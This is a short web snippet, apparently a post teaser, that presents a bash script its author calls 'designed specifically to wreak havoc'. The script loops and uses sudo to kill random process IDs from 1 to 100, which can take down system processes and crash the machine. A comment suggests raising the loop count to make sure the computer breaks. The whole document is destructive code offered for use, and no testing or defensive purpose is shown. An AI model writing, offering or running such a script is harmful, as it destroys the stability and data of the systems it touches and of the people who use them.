This program is designed specifically to wreak havoc.
read more#!/bin/bash
##change QUITS to something larger if you want to almost certainly fuck up the computer
QUITS=50
FLOOR=100
RANGE=200
count=1
NUMBER=$[ ( $RANDOM % 100 ) + 1 ]
while [ "$count" -le $QUITS ]
do
sleep 2
NUMBER=$[ ( $RANDOM % 100 ) + 1 ]
echo "Trying to kill $NUMBER"
sudo kill $NUMBER
let "count += 1"
done